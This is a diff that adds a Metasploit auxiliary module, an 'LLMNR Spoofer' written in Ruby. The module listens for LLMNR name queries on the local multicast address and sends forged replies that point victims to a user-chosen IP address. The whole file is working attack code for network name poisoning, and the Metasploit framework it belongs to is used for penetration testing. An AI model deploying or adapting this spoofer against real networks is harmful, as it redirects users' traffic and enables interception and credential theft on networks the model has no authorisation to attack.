|
| 1 | +## |
| 2 | +# This file is part of the Metasploit Framework and may be subject to |
| 3 | +# redistribution and commercial restrictions. Please see the Metasploit |
| 4 | +# web site for more information on licensing and terms of use. |
| 5 | +# http://metasploit.com/ |
| 6 | +## |
| 7 | + |
| 8 | +require 'msf/core' |
| 9 | +require 'socket' |
| 10 | +require 'ipaddr' |
| 11 | + |
| 12 | +class Metasploit3 < Msf::Auxiliary |
| 13 | + |
| 14 | +include Msf::Exploit::Capture |
| 15 | + |
| 16 | +attr_accessor :sock, :thread |
| 17 | + |
| 18 | + |
| 19 | + def initialize |
| 20 | + super( |
| 21 | + 'Name' => 'LLMNR Spoofer', |
| 22 | + 'Description' => %q{ |
| 23 | + LLMNR (Link-local Multicast Name Resolution) is the successor of NetBIOS (Windows Vista and up) and is used to |
| 24 | + resolve the names of neighboring computers. This module forges LLMNR responses by listening for LLMNR requests |
| 25 | + sent to the LLMNR multicast address (224.0.0.252) and responding with a user-defined spoofed IP address. |
| 26 | + }, |
| 27 | + 'Author' => [ 'Robin Francois <rof[at]navixia.com>' ], |
| 28 | + 'License' => MSF_LICENSE, |
| 29 | + 'References' => |
| 30 | + [ |
| 31 | + [ 'URL', 'http://www.ietf.org/rfc/rfc4795.txt' ] |
| 32 | + ], |
| 33 | + |
| 34 | + 'Actions' => |
| 35 | + [ |
| 36 | + [ 'Service' ] |
| 37 | + ], |
| 38 | + 'PassiveActions' => |
| 39 | + [ |
| 40 | + 'Service' |
| 41 | + ], |
| 42 | + 'DefaultAction' => 'Service' |
| 43 | + ) |
| 44 | + |
| 45 | + register_options([ |
| 46 | + OptAddress.new('SPOOFIP', [ true, "IP address with which to poison responses", ""]), |
| 47 | + OptRegexp.new('REGEX', [ true, "Regex applied to the LLMNR Name to determine if spoofed reply is sent", '.*']), |
| 48 | + OptInt.new('TTL', [ false, "Time To Live for the spoofed response", 300]), |
| 49 | + ]) |
| 50 | + |
| 51 | + register_advanced_options([ |
| 52 | + OptBool.new('Debug', [ false, "Determines whether incoming packet parsing is displayed", false]) |
| 53 | + ]) |
| 54 | + |
| 55 | + deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER') |
| 56 | + self.thread = nil |
| 57 | + self.sock = nil |
| 58 | + end |
| 59 | + |
| 60 | + def dispatch_request(packet, addr) |
| 61 | + rhost = addr[0] |
| 62 | + src_port = addr[1] |
| 63 | + |
| 64 | + # Getting info from the request packet |
| 65 | + llmnr_transid = packet[0..1] |
| 66 | + llmnr_flags = packet[2..3] |
| 67 | + llmnr_questions = packet[4..5] |
| 68 | + llmnr_answerrr = packet[6..7] |
| 69 | + llmnr_authorityrr = packet[8..9] |
| 70 | + llmnr_additionalrr = packet[10..11] |
| 71 | + llmnr_name_length = packet[12..12] |
| 72 | + name_end = 13 + llmnr_name_length.unpack('C')[0].to_int |
| 73 | + llmnr_name = packet[13..name_end-1] |
| 74 | + llmnr_name_and_length = packet[12..name_end] |
| 75 | + llmnr_type = packet[name_end+1..name_end+2] |
| 76 | + llmnr_class = packet[name_end+3..name_end+4] |
| 77 | + |
| 78 | + llmnr_decodedname = llmnr_name.unpack('a*')[0].to_s |
| 79 | + |
| 80 | + if datastore['DEBUG'] |
| 81 | + print_status("Received Packet from: #{rhost}:#{src_port}") |
| 82 | + print_status("transid: #{llmnr_transid.unpack('H4')}") |
| 83 | + print_status("tlags: #{llmnr_flags.unpack('B16')}") |
| 84 | + print_status("questions: #{llmnr_questions.unpack('n')}") |
| 85 | + print_status("answerrr: #{llmnr_answerrr.unpack('n')}") |
| 86 | + print_status("authorityrr: #{llmnr_authorityrr.unpack('n')}") |
| 87 | + print_status("additionalrr: #{llmnr_additionalrr.unpack('n')}") |
| 88 | + print_status("name length: #{llmnr_name_length.unpack('c')}") |
| 89 | + print_status("name: #{llmnr_name.unpack('a*')}") |
| 90 | + print_status("decodedname: #{llmnr_decodedname}") |
| 91 | + print_status("type: #{llmnr_type.unpack('n')}") |
| 92 | + print_status("class: #{llmnr_class.unpack('n')}") |
| 93 | + end |
| 94 | + |
| 95 | + if (llmnr_decodedname =~ /#{datastore['REGEX']}/i) |
| 96 | + #Header |
| 97 | + response = llmnr_transid |
| 98 | + response << "\x80\x00" # Flags TODO add details |
| 99 | + response << "\x00\x01" # Questions = 1 |
| 100 | + response << "\x00\x01" # Answer RRs = 1 |
| 101 | + response << "\x00\x00" # Authority RRs = 0 |
| 102 | + response << "\x00\x00" # Additional RRs = 0 |
| 103 | + #Query part |
| 104 | + response << llmnr_name_and_length |
| 105 | + response << llmnr_type |
| 106 | + response << llmnr_class |
| 107 | + #Answer part |
| 108 | + response << llmnr_name_and_length |
| 109 | + response << llmnr_type |
| 110 | + response << llmnr_class |
| 111 | + response << [datastore['TTL']].pack("N") #Default 5 minutes |
| 112 | + response << "\x00\x04" # Datalength = 4 |
| 113 | + response << Rex::Socket.addr_aton(datastore['SPOOFIP']) |
| 114 | + |
| 115 | + open_pcap |
| 116 | + # Sending UDP unicast response |
| 117 | + p = PacketFu::UDPPacket.new |
| 118 | + p.ip_saddr = Rex::Socket.source_address(rhost) |
| 119 | + p.ip_daddr = rhost |
| 120 | + p.ip_ttl = 255 |
| 121 | + p.udp_sport = 5355 # LLMNR UDP port |
| 122 | + p.udp_dport = src_port # Port used by sender |
| 123 | + p.payload = response |
| 124 | + p.recalc |
| 125 | + |
| 126 | + capture_sendto(p, rhost,true) |
| 127 | + if should_print_reply?(llmnr_decodedname) |
| 128 | + print_good("#{Time.now.utc} : Reply for #{llmnr_decodedname} sent to #{rhost} with spoofed IP #{datastore['SPOOFIP']}") |
| 129 | + end |
| 130 | + close_pcap |
| 131 | + else |
| 132 | + vprint_status("Packet received from #{rhost} with name #{llmnr_decodedname} did not match REGEX \"#{datastore['REGEX']}\"") |
| 133 | + end |
| 134 | + end |
| 135 | + |
| 136 | + def monitor_socket |
| 137 | + while true |
| 138 | + rds = [self.sock] |
| 139 | + wds = [] |
| 140 | + eds = [self.sock] |
| 141 | + |
| 142 | + r,w,e = ::IO.select(rds,wds,eds,0.25) |
| 143 | + |
| 144 | + if (r != nil and r[0] == self.sock) |
| 145 | + packet, host, port = self.sock.recvfrom(65535) |
| 146 | + addr = [host,port] |
| 147 | + dispatch_request(packet, addr) |
| 148 | + end |
| 149 | + end |
| 150 | + end |
| 151 | + |
| 152 | + |
| 153 | + # Don't spam with success, just throttle to every 10 seconds |
| 154 | + # per host |
| 155 | + def should_print_reply?(host) |
| 156 | + @notified_times ||= {} |
| 157 | + now = Time.now.utc |
| 158 | + @notified_times[host] ||= now |
| 159 | + last_notified = now - @notified_times[host] |
| 160 | + if last_notified == 0 or last_notified > 10 |
| 161 | + @notified_times[host] = now |
| 162 | + else |
| 163 | + false |
| 164 | + end |
| 165 | + end |
| 166 | + |
| 167 | + def run |
| 168 | + check_pcaprub_loaded() |
| 169 | + ::Socket.do_not_reverse_lookup = true |
| 170 | + |
| 171 | + multicast_addr = "224.0.0.252" #Multicast Address for LLMNR |
| 172 | + |
| 173 | + optval = ::IPAddr.new(multicast_addr).hton + ::IPAddr.new("0.0.0.0").hton |
| 174 | + self.sock = Rex::Socket.create_udp( |
| 175 | + 'LocalHost' => "0.0.0.0", |
| 176 | + 'LocalPort' => 5355) |
| 177 | + self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1) |
| 178 | + self.sock.setsockopt(::Socket::IPPROTO_IP, ::Socket::IP_ADD_MEMBERSHIP, optval) |
| 179 | + |
| 180 | + |
| 181 | + self.thread = Rex::ThreadFactory.spawn("LLMNRServerMonitor", false) { |
| 182 | + monitor_socket |
| 183 | + } |
| 184 | + |
| 185 | + print_status("LLMNR Spoofer started. Listening for LLMNR requests with REGEX \"#{datastore['REGEX']}\" ...") |
| 186 | + |
| 187 | + add_socket(self.sock) |
| 188 | + |
| 189 | + while thread.alive? |
| 190 | + select(nil, nil, nil, 0.25) |
| 191 | + end |
| 192 | + |
| 193 | + self.thread.kill |
| 194 | + self.sock.close rescue nil |
| 195 | + end |
| 196 | + |
| 197 | +end |
0 commit comments